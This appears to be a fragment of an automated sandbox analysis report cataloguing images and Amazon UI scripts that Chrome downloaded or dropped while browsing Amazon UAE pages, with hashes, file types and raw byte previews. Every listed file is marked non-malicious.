                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/11B2bsTfmvL._RC%7C11Y+5x+kkTL.js,51XFQXG4llL.js,11yKORv-GTL.js,11GgN1+C7hL.js,01+z+uIeJ-L.js,01VRMV3FBdL.js,21BJeD9yjcL.js,01cS+tLhj4L.js,11aD5q6kNBL.js,11rRjDLdAVL.js,51LGf0aHP5L.js,11nAhXzgUmL.js,11UNP9ncXuL.js,113pYUOav3L.js,11uo7qXoO3L.js,01VhK3jZdbL.js,21eKR4hvwNL.js,01490L6yBnL.js,51XuQjpKb8L.js,01JYHc2oIlL.js,31nfKXylf6L.js,01ktRCtOqKL.js,21xaWmFh45L.js,11bEz2VIYrL.js,31o2NGTXThL.js,01rpauTep4L.js,315n+VmgJ3L.js,01tvglXfQOL.js,11jxZ9ouCoL.js,01fBsnBQx0L.js_.js?AUIClients/AmazonUI&SldMFpTZ"
                                                                                                                                                                                                                                                                Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):14031
                                                                                                                                                                                                                                                                Entropy (8bit):7.931971681931018
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:TlLbK+kAeUpQ+/qwzKv8NtWnyJBtVCtDCrya:GKP/qwzzNtW0VCtDfa
                                                                                                                                                                                                                                                                MD5:97BD687413BC6A2995DE210A5872826F
                                                                                                                                                                                                                                                                SHA1:643A5E062B3846FA0282B85D9554209EAD181B04
                                                                                                                                                                                                                                                                SHA-256:DF7E75B795BCC16AC2BE53D95A951E42E67C1C82DB614F5083E381C338D64D9C
                                                                                                                                                                                                                                                                SHA-512:05A05C6B075AA96A94EB9E99E90B86F6D5AA39FF1D36AF3CEAE49F796ECD7603F0649A6094A3E8F48171AAEAEF7A8050FD9A09AE25CD38E14195EAC45E7031EE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81KPTvbMOYL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........(.."..........2...............................................................X...............#]^.l..'.wjS..4..........S.y.J..7....[5...0.P....5w.+...1.Gb..n.+.|qA...|..G....e.5.`.X...wI...zL.,.@........k.^Y.W....1...$}.p.T.<...e.....wz;..c...d..x-_.v...@...:....~R..fT....f;+.s...>..A..3Tby.gR...F..f]{.R.dh.R...2...........B.\s...{^...W....F.I..{.u^....\\.W..7.. Q..F.z.ng.L.+...;...V.7H1.L.B.nN...1......C.f..c..N8.t..*.[..^+H\.}o.q&...w.(...<Q.\.....Q]...K.*#.].x.\m..X.mh.f.s.K...I|y....7%.k..9..rE.tc......X.]...e.....#.g..\.z.S......'....w;..8.!.H.T.V...y.."....K....,Q.e.I.[<_.\r,..b.......G".l.W?;........5...KO..O...,A'.".K...v,..7..2.....Rx.Z.w...;1...u.SQ......+.{L..-xZ.4.du.-.<B..~e...............i.............z......n...'...p.*.7!.#..c..2...........CMt..e..`.b.........3
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, baseline, precision 8, 400x39, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9484
                                                                                                                                                                                                                                                                Entropy (8bit):7.867411824671817
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:q8KIzd4USNdPO/trSgHYDqs0a/6iGwskNpCdqDyP5ve:q8KOd1edPIHUiCqwsEpiPs
                                                                                                                                                                                                                                                                MD5:C8407BB0F31D12AF666791231B078919
                                                                                                                                                                                                                                                                SHA1:B00BD1145454A48D7EEFB8F5251D1ECFDC791012
                                                                                                                                                                                                                                                                SHA-256:2C420C04C72907D95082D29EF4D50DB13D4AD40A44F3649C842CFE5ECBE5B30F
                                                                                                                                                                                                                                                                SHA-512:6B0D4EF1EE10ED92AA320D71C7CD7F24925A2FE0A98D47B433692A342FD25499A7F1DF59F51FCC14BE702095490D3836A954A6E32EBD530497648305FBF7A9F8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.............................................................................................................................................2....Adobe.d...........'......................................................................................................!...."1A......#$%&Qa'()*23456789:BCDEFGHIJRSTUVWXYZbcdefghijqrstuvwxyz..........................................................................................8S............!....1A..."Q#2aq.........$%&'()*3456789:BCDEFGHIJRSTUVWXYZbcdefghijrstu..vwxyz..........................................................................................?..=..Eb..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b....=..Eb..Xa..1a....c.f..zZ...e..*..._..a.5+B.!.....6...l..k....jt.X.f.9.CS......UW.....*X6..........H...)qK.-*`in[..],.........TD...!NG@.O..`...@..C%.).Zr..d.VS..TU.=.P.y ...($..n..g)..X.w.zi.XL...`..@\C 1..v.%...B......!.T1D8..n...H......8.8/T.S".....F...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D1342%26pc%3D2729%26at%3D2729%26t%3D1723469090806%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:2728
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 400x39, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17856
                                                                                                                                                                                                                                                                Entropy (8bit):7.961084673859561
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:IgT5/Rd4Jz8avPVci1AwsE4y2jws601w9btvQw+B2ljhXr:d50JHvr1JG88wbtT77
                                                                                                                                                                                                                                                                MD5:F571009F634631B3BE343C11DE2AAEBA
                                                                                                                                                                                                                                                                SHA1:CBCCDD14D55A50DCB5D649633C1E3F4CD535777F
                                                                                                                                                                                                                                                                SHA-256:8D2A1F26F300BE517C195B4727F652675EA0BFE2E80D1DA1D3915134DA879D1F
                                                                                                                                                                                                                                                                SHA-512:7B7203AD354F9136BCCED77FA8BBA95BC99FA5DB4BB7EA75AA26F1FC149B710B120BAC3BAF9719AD11750E6359E9AF450D0F352CB0D56514A381858B821E94FC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.....d.d..............................................................................................................................................'...............9.......................................................................I.^.....mQ,.S*P..^=....I.>N...r.S..u...8.l.:..|`8..'..C.2.a.................SMp..7..T..!.......eA.L!........oO..%.......w.....ti.....+..qa..)x4v|.Q..;G..\.h.......4..|..Q.._..#6K....E>^e=2|.h.S....................u.!.V.........W.y..o.n.B...:G..@.enx{.j.u.k..ij..D..Pn........_.?..v...-N {2..ad=.&...c...@......MR...z.%F...C*.....X..3.....{.T...n....v;.V...............$z3lDe&;Q.8.......vJ.X...5V...?P@.%.................K.jb>.....6pt$+R....#..`d.).....NR.sT-o.I.>..wO;a]#.g4.MYh-..........s..1M...O..SQ..'4.q......C..C*...W.~...K...Q/............<..{.^..>>s.<..}.[n..wW.m{...g....5..pt.......`2.........@........?P....H..............................!."#1R....2A 6BQa$%0Fv......&3q45@CEUb..........?.....z./..5...x.9k{..!.%P.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):65568
                                                                                                                                                                                                                                                                Entropy (8bit):7.972734414417205
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:vOVvtP7gAcRAbg1KLE/1KFA/YlRe5MaqdonYTqdGNvuyb:vMFP7SRAs1KAYl45MKnYewNvuu
                                                                                                                                                                                                                                                                MD5:7EEDD01A919D7135E14C607DF9F34A8F
                                                                                                                                                                                                                                                                SHA1:D0883DE70E0B06479036934BA9CE23AC870C4900
                                                                                                                                                                                                                                                                SHA-256:CE5801AD5AC28CC87F73784BBA9E6AAE819FB432F15F5C919735453D550B9A11
                                                                                                                                                                                                                                                                SHA-512:962605CB9BA7458BE8E0D719CB57C865BFD72548F6BB5DC98A5DACEF1F8F46E4D6E86F0101D6E949F18276075BC02D4AD805E8CC373585BC663C9986AAC08FAD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986223_UAE_Budget_Store_AE_xsite_grocery_en_400x400_2X._CB644457599_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................;.................................................................................X..........F.x.n[.........y..+/.....&.[?0....m................=..,{..u.(.vE....../{.ylf...C.w.u.^_. ..........F>.3..l..c.p.ws........"[..s.4..'.H............6.vh.......:........(...N.k|..,/...........V?..w6v.P`...........6.v.s.....d...........n.sck8.Z...........)5A<zO.r.f. ......C................0..;=..4~K.sKz.=..........mp... .....,...D.#.......T.b..&e.l..C....n.J!..}f.6GK.....GS.V.....?.._.z......Z..l...w5.i..Z@.... h..C.............g%+w;A.....mk.......#x...B.;=.......,w....G...'.:.y.......-r.......GmY.P..{g........./.?.'..0....]0;....]..k>|.}.Z.........*hs...:..........N.9..N.<}.U..w........H.......4.+#.{...V.....~.w.;..v....:M.?.......$...............+wj.yEb....m.]f...7.jY..;Q<y.. ..%h...C.d.L....}+;.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:P3EBDX30THKD0V702NQB$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DP3EBDX30THKD0V702NQB%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D7580%26at%3D7580%26t%3D1723469085486%26csmtags%3DstartVL%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DP3EBDX30THKD0V702NQB%26aftb%3D1%26lob%3D1:7579
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (64565)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):331197
                                                                                                                                                                                                                                                                Entropy (8bit):5.457377606315039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:5w70TUq0mTaL+gsW5MmGaW5gERNmJAK/OaZ05Z:5MRSW5aaW5grJAKrZ05Z
                                                                                                                                                                                                                                                                MD5:8D11E1344E8D218C563D06A64C47EE02
                                                                                                                                                                                                                                                                SHA1:FC949176844C9C12D7AE368311EF1B832DEDDA2E
                                                                                                                                                                                                                                                                SHA-256:FF7231C17F8AC6BB63F69FEEE9F023841DF9D2F8534E0ECCA62E5C8FE376E1BA
                                                                                                                                                                                                                                                                SHA-512:522D4DF630C41CFADBDD966A87419BCC57D5F3FAC2B1C1026C3C11312442144B7A69721FA25914E8F287C93F42C89662571891FA0C2F71B2C9447A934D594F7C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:;(function(f) {. if (typeof window !== 'undefined') {. . return P.execute('siege-cse', function() {. try {. f();. P.declare('siege-cse', window.SiegeCrypto);. } catch (e) {. try {. . if (window.callPhantom && (!Function.prototype.bind || Function.prototype.bind.toString().replace(/bind/g, 'Error') != Error.toString())) {. console.log('siege-cse does not support PhantomJS 1.x, skipping error reporting');. return;. }. } catch (e) {}.. P.logError(e, 'siege-cse init error: ', 'WARN', 'siege-cse');. return;. }. });. } else if (typeof importScripts !== 'undefined') {. . return f();. } else {. throw new Error('Cannot initialize SiegeCrypto outside window or worker');. }.})(function() {. /////////////////////////.// BEGIN FILE SiegeCrypto.js./////////////////////////./*...Full source (including license, if applicable) included below..*/.!function(e,t){"object"==typeo
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):14548
                                                                                                                                                                                                                                                                Entropy (8bit):7.910394419872942
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:dewlaN14XMXmhDsmSfwfM1YVjoE8G8qndabi6K5z10eDCjLW8SfIKrnBlyLJiTic:dWN1FuDs0N1oN5ZUV1wK8SfIQB5mhhSH
                                                                                                                                                                                                                                                                MD5:23A14F615CC6031BD0EB239B7F1B0374
                                                                                                                                                                                                                                                                SHA1:A008873F3E5EA79F8C8EB013DC3AA816E19C3C09
                                                                                                                                                                                                                                                                SHA-256:AF6599C3F6A84B67E7FF16F0B1C68D1B968AF5FDA303E7A196B2E442D1BCB727
                                                                                                                                                                                                                                                                SHA-512:195D41CA65768B912A3C3BBDB0B155E042AD1734A431A5B02BF7F84E9E13E5AE9A21C97DF95C963CEF7172886483442C07ABB405321BF05D6C84F65AA029EEE7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/813rUU6R6uL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4...............................................................................v.....r/.[.s)........................\.....!......e,...................{.Y.....6......I.@..................=..q....bS.G|.....................l|..D...H.hH....................Y.@........>.....x@...............Q.f..ir.g....n.p..n<.T..../p..J......'.$H..............B.4.}......1........,4..9...L..>.w..&l....[.__f....w..Z.G?X............g6...pb...\{.iZk.;...k.M[p...l\.$>..[.e+...r..q..};....S#:'...~.................<.$j...X...{..>..\.......]...I..&...\.'..w...7..u..Y....?^.....~.t.......ht.........91.{........<=..g.m.<..z.+.R.b.}DN).e.... {y?5kv.._.....=..f..z.~1.........!.k.......}.o..i..=3...}O.p...?.~..................@...Y....l......4..~Do.<..h.>..w...3/..5.4_.G<&=.w.............v.....*....S....._\.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):25781
                                                                                                                                                                                                                                                                Entropy (8bit):7.965987596311549
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:70v/om1nzDPGjupe9YFu6npeeG1N3DO+y:Dm1n/GjupegzLGTzOb
                                                                                                                                                                                                                                                                MD5:DD3025FBA8198FE551489BE56F9045FD
                                                                                                                                                                                                                                                                SHA1:6BD2557DD7A1E1AEBBDD9E17C9E50060BC22D44A
                                                                                                                                                                                                                                                                SHA-256:CD08BB063312BC60016C51BAE229CEB5BF9EFF4D8332B4C2F7C84232F55D1158
                                                                                                                                                                                                                                                                SHA-512:7E59FF84DCFD09A2793F99F450A3DB753B49A1833772BC226F827CFB24C7FDC00F013C832B794797BE643DF9DB1F4680F9F039A94AE704563FD605590FFF0E22
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................0.{.."..........8.....................................................................................................................o..+b...B..GMO....?~p>.........9>.....>9.m............."..lz./Z-V.j.k...Ts.>.....*..S.T...(E...........H.u.IU~.O..2........(.......z..}.jr..o.t....Q......tn:..s]\..N..J../.....6...S............(.Z.>........r..r3...I.c.0o...{E.Q.iR..t.....v.r@0.S_..*.9....AH\9=..;.....7.f...\.y..E.$x.....dM..e.m{.d........A.>?.OX....Fg.....[..,~.a...f.9..5...&..?...|...W,s.n5[..uy.7.3.]z.c.g.5c.&E..;..B.>....n\|.....mK.h.v.......SM.=.T.u..:.W...1}[.Y......m.G.U...Y*%.....y..t.1.......i.%...........^Q..Y5...Q.X...B.....H.e]W...j.^L..a.F.......P.KCcP...1.^....T+.;c..z:u...r.......$..LS..........]..P..%.....Q.-x...c[..L.......:.w......"... .....=.....k{..a.......>i.....N.\.Wx...F
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 251x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12724
                                                                                                                                                                                                                                                                Entropy (8bit):7.942690940344395
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:BwDB+McMVz1my9Vc3CiNwgLj+at90Y18ofx9:mDfB1LY3CtgmatPqs7
                                                                                                                                                                                                                                                                MD5:83D92C6A7E4CD7CE6A625468A40BDC23
                                                                                                                                                                                                                                                                SHA1:ABFD556C1EDAEFF53E77D6AB25BF67AB064214EA
                                                                                                                                                                                                                                                                SHA-256:3E6EB6A04010DAC80A481CBC276B215A7823DECBE7D662578D8247879BA7F2DA
                                                                                                                                                                                                                                                                SHA-512:78F9FE55C5631279335953A7C465B26215EA0A12D517B37D523702C66D6044C3C91B03538A465F40A0875B81FE168047DD9004DB47350858785696D607168720
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................i!%.L!...?.^w..Q.=..M...5..)}..........F.X[....n.$...HI!$.f.6.J.].n..}.1V..j}.....-..hH...=..N...F......|..`..BI.$$..F4..F.T..u.5.}.?.e..E.6..oFM...%...>M~./C..<..avT.zr........H_?P.=.:..D.,....au. ......._B...eN...Jb\..j.cv5....%.....y..o.......O...y.2...T.K.7.D.H>...~......o.,.8C...s..Z......'..Yx..a.l7.g_..I....?9.+.....+..j.....y......VI.'....:...+E...VrK>..-.....n6zFVm.G.wb.J[)..U..@O.c .Y..8.c.e......ZF....Ee......5....r.kozS....S....a.X..~.a.k...|.6!..].|..f].4F{..a..._..J .d.^..u.f..%...X\.?C...K..I.....H....If.h.6j5.=8.#..Z.R.=*.....>]....6u...^.Y..BA;"..k.G?..c.k..j.v..R..q}..[..A.^....3c_L....P,[.~T1.{P..}.4K.....aC. ..8y...e{..(.m.>.q,.{K...iYvO.,Q......B..{.I.H..&}/.{.7..*....:..N\|.c...di.sfU
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):13475
                                                                                                                                                                                                                                                                Entropy (8bit):7.94161949675778
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:BlGfeSi3O00hlro8KCRSL1T9Yzf3Df7nICQk:BlGDip0h1KCEJiDj5
                                                                                                                                                                                                                                                                MD5:B9EA4617404874297DA5450AB063625F
                                                                                                                                                                                                                                                                SHA1:24C35AC3CBC4B0F8F917896075B494070E154C40
                                                                                                                                                                                                                                                                SHA-256:69520ED11A70C5A69ED95F70681AF57F686231E3947F3435AA49236998CCFD59
                                                                                                                                                                                                                                                                SHA-512:540D51457B886315230E24E2FE63CB240661D5F4EE1FEF9002E7C21FE9C57A6596101A1DD13460E28796B59A3C9C0057D8D79E4A143FE8E312B0D1669D956D5C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/51T2Um0+IxS._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4.................................................................g...#...z....X.`e...X.`e...X.`e...X.`e...X.`e...X..|.a...#.(....{.t.3.,.;P..^...l..8.h....g.r=..a....;.(.CW}.6...+3..Vv._|..m.@.....3.......t....d...gU6.......W0.........~..g...W.%....i......}..V..:..mA.MH.>?.....kg...N....g..l....I............ .....v:...vE.0....=.<..<.SX5...Mfw1.W.g.....Zk..O^....'t..t...9.6c6.gr.....l.M......S[...k..kg.[MB\K.~....=Z?g.Z...[.:.`.....v:...vE.0..9=.d`..3:..l....=...M.f.:..nu.*I...'..M._.7.......j.......\.a%..T......-../..l.. .....u....:`.{\.}. |.....u7l..|........4.....n.];3.......1......d...................#.(...}~_S....|....ll....9.....jLu.e)..eYz....i......}.7-P.....h...........v:...vE.0.=....q.u.f.M^../.~\..k..d.w....>....\5..7>.m.O.5..N...}S.......wl.>P..............`...W......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1004
                                                                                                                                                                                                                                                                Entropy (8bit):0.9380934510690246
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:HN/NFd1/NvXvXvXvFvNvf1/3/VXvXvXvXvFvNvfV/dN/NvXvXvXvFvNvfd/9F9vv:X
                                                                                                                                                                                                                                                                MD5:E83F67FACFAFC20938D0295EE1000973
                                                                                                                                                                                                                                                                SHA1:685EE20518BD60E9B9F164545B1CA05115C95BF6
                                                                                                                                                                                                                                                                SHA-256:3460718375DEFEFE230CE4F0DA8DECF882B41880DDA265CE16B27CB17FF18278
                                                                                                                                                                                                                                                                SHA-512:BAE2933FD87BDE19B0C3B43CDEB297C95AF5082D5E4449AB0B78A4F282717AF027AA8359AA9BF7CAA5EC0C6616FF4752066D751D5D4C3E9707DED0810A021A5D
                                                                                                                                                                                                                                                                Malicious:false
